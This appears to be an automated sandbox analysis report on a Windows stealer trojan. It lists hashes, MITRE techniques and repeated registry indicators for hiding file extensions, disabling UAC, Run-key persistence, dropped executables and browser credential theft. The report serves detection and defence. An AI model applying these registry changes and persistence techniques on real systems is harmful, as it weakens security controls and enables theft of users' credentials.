813461a3a081432c973b8fb35dbd0228b90432ff57c6235f99a0c854cf866f6f

Analysis

max time kernel
150s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
09/07/2023, 16:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

993d2674077cd5exeexeexeex.exe
Size

201KB
MD5

993d2674077cd569f2ea3cc2b72e8974
SHA1

dfcaf4adb3f29638ed75d5ec50c78b65767f16b7
SHA256

813461a3a081432c973b8fb35dbd0228b90432ff57c6235f99a0c854cf866f6f
SHA512

255af30f8a5d8ad479344fc28bbddd057c784ebb3ed60d09ad5b40de904d5a0b80255a228890cbff7b132698ec1dbc075b1ebfa0873fdc6aa043047b10c46d1c
SSDEEP

3072:k7rDRbCM0PPrC5l0MlhWz5wTS1F8WKv0DLyH7qIpVjoJDD+5qxAYUzyGxxizXjNH:4HVC7W12FhKsaGOiDBxAxhxxizN

Score

10^/10

evasion persistence spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cscript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cscript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihclient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Conhost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation	xaMcwwYU.exe

Executes dropped EXE 2 IoCs

pid	Process
5036	xaMcwwYU.exe
2752	EgooQIMk.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xaMcwwYU.exe = "C:\\Users\\Admin\\uCcEIEgg\\xaMcwwYU.exe"	xaMcwwYU.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EgooQIMk.exe = "C:\\ProgramData\\BgUYMIss\\EgooQIMk.exe"	EgooQIMk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xaMcwwYU.exe = "C:\\Users\\Admin\\uCcEIEgg\\xaMcwwYU.exe"	993d2674077cd5exeexeexeex.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EgooQIMk.exe = "C:\\ProgramData\\BgUYMIss\\EgooQIMk.exe"	993d2674077cd5exeexeexeex.exe

Checks whether UAC is enabled 1 TTPs 32 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	993d2674077cd5exeexeexeex.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	993d2674077cd5exeexeexeex.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\shell32.dll.exe	xaMcwwYU.exe
File opened for modification	C:\Windows\SysWOW64\shell32.dll.exe	xaMcwwYU.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
1140	reg.exe
1848	reg.exe
1068	reg.exe
1608	reg.exe
3928	reg.exe
224	reg.exe
4012	reg.exe
1724	reg.exe
4768	reg.exe
4636	reg.exe
3052	reg.exe
